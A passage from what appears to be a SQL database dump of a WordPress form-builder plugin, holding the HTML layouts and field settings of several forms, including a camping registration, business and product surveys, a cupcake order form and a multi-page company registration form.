concern:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - type_submit_reset_7%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',10,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',0,'%all%','%all%',8,1,'1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','1#**id**#Camper Name:#**label**#type_name#****#2#**id**#Camper Age Group:#**label**#type_own_select#****#3#**id**#Desire Cabin:#**label**#type_radio#****#4#**id**#Does any one have allergies?#**label**#type_radio#****#5#**id**#Has the camper been camping before?#**label**#type_radio#****#6#**id**#Any questions or concern:#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'1*:*id*:*type_name*:*type*:*Camper Name:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_own_select*:*type*:*Camper Age Group:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:****6-8***8-12***12-15*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****6-8***8-12***12-15*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Desire Cabin:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*hor*:*w_flow*:*Cabin 1***Cabin 2***Cabin 3***Cabin 4***Cabin 5***Cabin 6*:*w_choices*:*false***false***false***false***false***false*:*w_choices_checked*:*3*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Cabin 1***Cabin 2***Cabin 3***Cabin 4***Cabin 5***Cabin 6*:*w_choices_value*:*****************:*w_choices_params*:**:*w_class*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*Does any one have allergies?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*Has the camper been camping before?*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Any questions or concern:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Registration Form','Camping can be enjoyed through all four seasons.','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/3.png','none',1),(4,'Business Demographic Survey','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - <b>What is your employment status?</b>%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - <b>What is your level of education?</b>%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - <b>In which industry do you work?</b>%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - <b>What is the annual revenue of your company?</b>%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Word Verification:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - type_submit_reset_7%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',1,'<p>%all%</p>','<p>%all%</p>',8,1,'2#**id**#&lt;b&gt;What is your employment status?&lt;/b&gt;#**label**#type_radio#****#3#**id**#&lt;b&gt;What is your level of education?&lt;/b&gt;#**label**#type_radio#****#4#**id**#&lt;b&gt;In which industry do you work?&lt;/b&gt;#**label**#type_own_select#****#5#**id**#&lt;b&gt;What is the annual revenue of your company?&lt;/b&gt;#**label**#type_radio#****#6#**id**#Word Verification:#**label**#type_captcha#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','2#**id**#&lt;b&gt;What is your employment status?&lt;/b&gt;#**label**#type_radio#****#3#**id**#&lt;b&gt;What is your level of education?&lt;/b&gt;#**label**#type_radio#****#4#**id**#&lt;b&gt;In which industry do you work?&lt;/b&gt;#**label**#type_own_select#****#5#**id**#&lt;b&gt;What is the annual revenue of your company?&lt;/b&gt;#**label**#type_radio#****#6#**id**#Word Verification:#**label**#type_captcha#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'2*:*id*:*type_radio*:*type*:*<b>What is your employment status?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Employed full time***Trade or Vocational degree***Not employed, but looking for work***Not employed and not looking for work***Retired***Student***Homemaker***Prefer not to answer*:*w_choices*:*false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Employed full time***Trade or Vocational degree***Not employed, but looking for work***Not employed and not looking for work***Retired***Student***Homemaker***Prefer not to answer*:*w_choices_value*:***********************:*w_choices_params*:**:*w_class*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*<b>What is your level of education?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Some high school***High school graduate or equivalent***Trade or Vocational Degree***Some college***Associate degree***Bachelor\'s degree***Graduate or Professional degree***Prefer not to answer*:*w_choices*:*false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Some high school***High school graduate or equivalent***Trade or Vocational Degree***Some college***Associate degree***Bachelor\'s degree***Graduate or Professional degree***Prefer not to answer*:*w_choices_value*:***********************:*w_choices_params*:**:*w_class*:**:*new_field*:*4*:*id*:*type_own_select*:*type*:*<b>In which industry do you work?</b>*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:****option 1***option 2***option 3*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****option 1***option 2***option 3*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*5*:*id*:*type_radio*:*type*:*<b>What is the annual revenue of your company?</b>*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Under $10,000***$10,001 to $50,000***$50,001 to $100,000***$100,001 to $500,000***$500,001 to $1 Million***$1 Million to $10 Million***$10 Million to $50 Million***$50 Million to $100 Million***Over $100 Million*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Under $10,000***$10,001 to $50,000***$50,001 to $100,000***$100,001 to $500,000***$500,001 to $1 Million***$1 Million to $10 Million***$10 Million to $50 Million***$50 Million to $100 Million***Over $100 Million*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*6*:*id*:*type_captcha*:*type*:*Word Verification:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Business Demographic Survey','<div id=\"subHeader_1\">Thank you for joining our business demographic survey. Please give us your feedback by filling in the information bellow.</div>','','none',1),(5,'Product Survey','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - 1. Please indicate if you agree or disagree with the following statements%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - 2. How likely are you to recommend [Product/Service] to a friend or co-worker?%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - 3. What is the amount you would ever pay for a product like ours%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - 4. Please rate the product %</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',0,'%all%','%all%',7,1,'2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'2*:*id*:*type_matrix*:*type*:*1. Please indicate if you agree or disagree with the following statements*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*radio*:*w_field_input_type*:****Product is affordable***Product is valuable***Product is better<br> than other products on<br> the market***Product is easy to use*:*w_rows*:****Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree*:*w_columns*:*no*:*w_required*:*wdform_matrix*:*w_class*:**:*w_textbox_size*:**:*new_field*:*3*:*id*:*type_scale_rating*:*type*:*2. How likely are you to recommend [Product/Service] to a friend or co-worker?*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*Will not recommend  ***  I will recommend*:*w_mini_labels*:*5*:*w_scale_amount*:*no*:*w_required*:*wdform_scale_rating*:*w_class*:**:*new_field*:*4*:*id*:*type_range*:*type*:*3. What is the amount you would ever pay for a product like ours*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*40*:*w_field_range_width*:*1*:*w_field_range_step*:*null*:*w_field_value1*:*null*:*w_field_value2*:*From***To*:*w_mini_labels*:*no*:*w_required*:**:*w_class*:**:*new_field*:*5*:*id*:*type_star_rating*:*type*:*4. Please rate the product *:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*10*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Product Survey','','','none',1),(6,'Cupcake Order Form','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Date%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Cupcakes Flavors (1 doz. minimum)%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Quantity%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Details (if any)%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - type_submit_reset_7%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',5,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',0,'%all%','%all%',8,1,'1#**id**#Date#**label**#type_date_new#****#2#**id**#Name#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Cupcakes Flavors (1 doz. minimum)#**label**#type_checkbox#****#5#**id**#Quantity#**label**#type_own_select#****#6#**id**#Details (if any)#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','1#**id**#Date#**label**#type_date_new#****#2#**id**#Name#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Cupcakes Flavors (1 doz. minimum)#**label**#type_checkbox#****#5#**id**#Quantity#**label**#type_own_select#****#6#**id**#Details (if any)#**label**#type_textarea#****#7#**id**#type_submit_reset_7#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'1*:*id*:*type_date_new*:*type*:*Date*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_date*:*yes*:*w_required*:*no*:*w_show_image*:**:*w_class*:*mm/dd/yy*:*w_format*:*0*:*w_start_day*:**:*w_default_date*:**:*w_min_date*:**:*w_max_date*:**:*w_invalid_dates*:*yes***yes***yes***yes***yes***yes***yes*:*w_show_days*:*yes*:*w_hide_time*:*...*:*w_but_val*:*no*:*w_disable_past_days*:**:*new_field*:*2*:*id*:*type_name*:*type*:*Name*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_checkbox*:*type*:*Cupcakes Flavors (1 doz. minimum)*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*ver*:*w_flow*:*Red Velvet ($150.00 TTD)***Vanilla ($100.00 TTD)***Chocolate ($120.00 TTD)***Guinness ($150.00 TTD)***Coconut ($120.00 TTD)***Lemon ($100.00 TTD)***Chocolate Mint ($120.00 TTD)*:*w_choices*:*false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Red Velvet ($150.00 TTD)***Vanilla ($100.00 TTD)***Chocolate ($120.00 TTD)***Guinness ($150.00 TTD)***Coconut ($120.00 TTD)***Lemon ($100.00 TTD)***Chocolate Mint ($120.00 TTD)*:*w_choices_value*:********************:*w_choices_params*:**:*w_class*:**:*new_field*:*5*:*id*:*type_own_select*:*type*:*Quantity*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*50*:*w_size*:****1***2***3***4***5***6***7***8***9***10*:*w_choices*:*true***false***false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*true***false***false***false***false***false***false***false***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****1***2***3***4***5***6***7***8***9***10*:*w_choices_value*:********************************:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Details (if any)*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Order a cupcake','Because every cake has a story to tell.','','none',1),(11,'Standard Company Registration Form Copy','embedded','info@companyregistration.online,','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Section 1\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Insert todays date:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\" style=\"\">%2 - Proposed Company Names:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - custom_3%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - How many Directors in your company:%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - custom_5%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Do you have a business address:%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - custom_7%</div></div></div><div wdid=\"8\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%8 - custom_8%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - custom_9%</div><div wdid=\"10\" class=\"wdform_row ui-sortable-handle\" style=\"\">%10 - Physical Address of the business:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"></div><div id=\"page_numbersform_id_temp1\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">1/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_1\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view2\" page_title=\"Section 2\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"true\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - custom_16%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - custom_17%</div><div wdid=\"18\" class=\"wdform_row ui-sortable-handle\" style=\"\">%18 - Full Name:%</div><div wdid=\"19\" class=\"wdform_row ui-sortable-handle\" style=\"\">%19 - Phone:%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - Physical home address 1:%</div></div></div><div wdid=\"26\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%26 - custom_26%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"27\" class=\"wdform_row ui-sortable-handle\">%27 - custom_27%</div><div wdid=\"40\" class=\"wdform_row ui-sortable-handle\" style=\"\">%40 - Full Name:(2)%</div><div wdid=\"41\" class=\"wdform_row ui-sortable-handle\" style=\"\">%41 - Phone:(2)%</div><div wdid=\"28\" class=\"wdform_row ui-sortable-handle\">%28 - Physical home address 2:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav2\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_2\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp2\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">2/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_2\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view3\" page_title=\"Section 3\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"55\" class=\"wdform_row ui-sortable-handle\" style=\"\">%55 - Phone:(4)%</div><div wdid=\"42\" class=\"wdform_row ui-sortable-handle\" style=\"\">%42 - custom_42%</div><div wdid=\"43\" class=\"wdform_row ui-sortable-handle\" style=\"\">%43 - Full Name:(3)%</div><div wdid=\"44\" class=\"wdform_row ui-sortable-handle\">%44 - Phone:(3)%</div><div wdid=\"45\" class=\"wdform_row ui-sortable-handle\">%45 - Physical home address 3:%</div></div></div><div wdid=\"51\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%51 - custom_51%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"53\" class=\"wdform_row ui-sortable-handle\" style=\"\">%53 - custom_53%</div><div wdid=\"54\" class=\"wdform_row ui-sortable-handle\" style=\"\">%54 - Full Name:(4)%</div><div wdid=\"56\" class=\"wdform_row ui-sortable-handle\">%56 - Physical home address 4:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav3\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_3\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp3\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">3/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"><span id=\"page_next_3\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Next</span></div></div></div></div></div></div></div></div><div class=\"wdform-page-and-images\" style=\"display: table; border-width: 1px; border-top: 1px solid black;\"><div id=\"form_id_tempform_view4\" page_title=\"Section 4\" class=\"wdform_page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"62\" class=\"wdform_row ui-sortable-handle\">%62 - custom_62%</div><div wdid=\"63\" class=\"wdform_row ui-sortable-handle\">%63 - Upload certified Copies of all Director/s IDs/Passports:%</div><div wdid=\"64\" class=\"wdform_row ui-sortable-handle\">%64 - custom_64%</div><div wdid=\"66\" class=\"wdform_row ui-sortable-handle\" style=\"\">%66 - type_submit_reset_66%</div><div wdid=\"65\" class=\"wdform_row ui-sortable-handle\">%65 - Was the form easy to complete?:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav4\" style=\"display: table-row;\"><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"left\"><span id=\"page_previous_4\" class=\"wdform-page-button\" style=\"cursor: pointer;\">Previous</span></div><div id=\"page_numbersform_id_temp4\" valign=\"middle\" style=\"display: table-cell;\" align=\"center\"><span class=\"page_numbersform_id_temp\">4/4</span></div><div valign=\"middle\" style=\"display: table-cell; width: 40%;\" align=\"right\"></div></div></div></div></div></div></div></div>',0,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',67,1,'1#**id**#Insert todays date:#**label**#type_date_new#****#2#**id**#Proposed Company 